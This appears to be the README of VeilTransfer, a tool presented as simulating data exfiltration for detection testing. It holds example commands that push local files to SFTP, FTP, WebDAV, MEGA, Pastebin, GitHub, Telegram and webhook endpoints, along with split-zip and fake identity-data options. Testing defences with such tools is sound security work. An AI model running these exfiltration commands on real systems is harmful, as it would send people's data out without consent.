


VeilTransfer is a data exfiltration utility designed to test and enhance the detection capabilities. This tool simulates real-world data exfiltration techniques used by advanced threat actors, allowing organizations to evaluate and improve their security posture. By leveraging multiple exfiltration methods such as MEGA, Github, SFTP, WebDAV, and more, VeilTransfer helps identify gaps in your defenses and ensures your security solutions are prepared to counter modern data breaches.

Supported Exfiltration Methods

Additional Features

Fake Data Generation

VeilTransfer also supports generating fake data, including:

Zip Data Creation

Easily create zip files for bundling and compressing data, which can then be used for exfiltration or testing different scenarios.

Example Use Cases

Example Usage


Transfer a File via SFTP

This example demonstrates how to securely transfer a file to a remote server using the SFTP protocol. The file is located on the local machine, and it's transferred to the specified remote directory using SSH authentication.

VeilTransfer transfer -method sftp -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server example.com:22 -username user -password pass

Transfer Files to a WebDAV Server

In this example, files from a local directory are uploaded to a WebDAV server. The server requires a username and password for authentication. The server parameter includes the URI scheme (https:// or http://).

VeilTransfer transfer -method webdav -localPath /path/to/directory -remoteDir /remote/path -server http://webdav.example.com:8080 -username user -password pass

Transfer Files to Mega Cloud

This example shows how to transfer files to Mega Cloud storage. The files are uploaded from a specified local directory, and the authentication is handled using the user's Mega Cloud credentials.

VeilTransfer transfer -method mega -localPath (/path/to/file or /path/to/directory) -username megauser@example.com -password megasecretpassword

Transfer Files via FTP

In this example, a file is uploaded to an FTP server. The file is transferred to a specific directory on the remote server. The server requires a username and password for authentication.

VeilTransfer transfer -method ftp -localPath (/path/to/file or /path/to/directory) -remoteDir remote/path -server ftp.example.com:21 -username ftpuser -password ftppassword

Upload a File to Pastebin

This example demonstrates how to upload the contents of a file to Pastebin. The content is posted to Pastebin using an API key provided by the user.

VeilTransfer transfer -method pastebin -localPath (/path/to/file or /path/to/directory) -apiKey your_pastebin_api_key

Send a File to a Github Repository

This example shows how to push a file from the local machine to a specific GitHub repository. The file is added to the repository using the user's GitHub API token for authentication.

VeilTransfer transfer -method github -localPath (/path/to/file or /path/to/directory) -repo yourusername/repository -apiKey your_github_api_token

Send a File to a Telegram Channel

This example demonstrates how to send a file to a specific Telegram channel. The file is sent using a Telegram bot API token, and the message is delivered to the specified channel ID.

VeilTransfer transfer -method telegram -localPath (/path/to/file or /path/to/directory) -telegramAPI your_telegram_bot_api_token -channelID 123456789

Send Data to a Webhook URL

In this example, the contents of a file are sent to a specified Webhook URL.

VeilTransfer transfer -method webhook -localPath (/path/to/file or /path/to/directory) -webhookURL https://webhook.site/your-webhook-url

Create Zip Files

Create a Simple Zip File

This example shows how to create a zip file from a specified directory. The output is a single zip file containing all the files from the directory.

VeilTransfer create-zip -localPath /path/to/directory -outputPath /path/to/output.zip

Create a Split Zip File

This example demonstrates how to create a zip file that is split into multiple parts, with each part being no larger than the specified size. This is useful for transferring large files in smaller chunks.

VeilTransfer create-zip -localPath /path/to/directory -outputPath /path/to/output.zip -splitSize 1000000

Data Generator

Generate 100 Fake Credit Card Numbers

This example shows how to generate 100 entries of fake credit card data. The generated data will include credit card numbers, expiration dates, and associated details.

VeilTransfer generate-fake -ccn -count 100

Generate 50 Fake Indonesian KTP Entries

This example demonstrates how to generate 50 entries of fake KTP data, which are Indonesian identity cards. The data includes personal information such as name, address, and KTP number.

VeilTransfer generate-fake -ktp -count 50

Generate 200 Fake Social Security Numbers

This example shows how to generate 200 entries of fake SSN data. This is useful for applications requiring large datasets of U.S. Social Security Numbers.

VeilTransfer generate-fake -ssn -count 200


Contributions to VeilTransfer are welcome! If you have ideas for new features, exfiltration methods, or improvements, please submit a pull request or open an issue on GitHub.